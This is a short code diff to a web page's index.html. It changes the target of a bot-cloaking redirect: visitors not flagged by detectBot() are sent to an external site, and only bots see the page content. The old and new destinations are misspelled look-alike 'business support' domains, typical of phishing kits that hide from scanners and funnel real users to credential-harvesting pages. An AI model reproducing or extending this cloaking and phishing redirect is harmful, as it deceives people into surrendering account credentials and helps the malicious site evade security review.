--- a/index.html
+++ b/index.html
@@ -62,7 +62,7 @@
 
     window.onload = function() {
       if (!detectBot()) {
-        window.location.replace("https://co-verify-contact-bussines-2025.netlify.app/")
+        window.location.replace("http://www.igsupporot-bussiness-2025.top/live")
       } else {
         document.getElementById('content').style.display = 'block'
       }
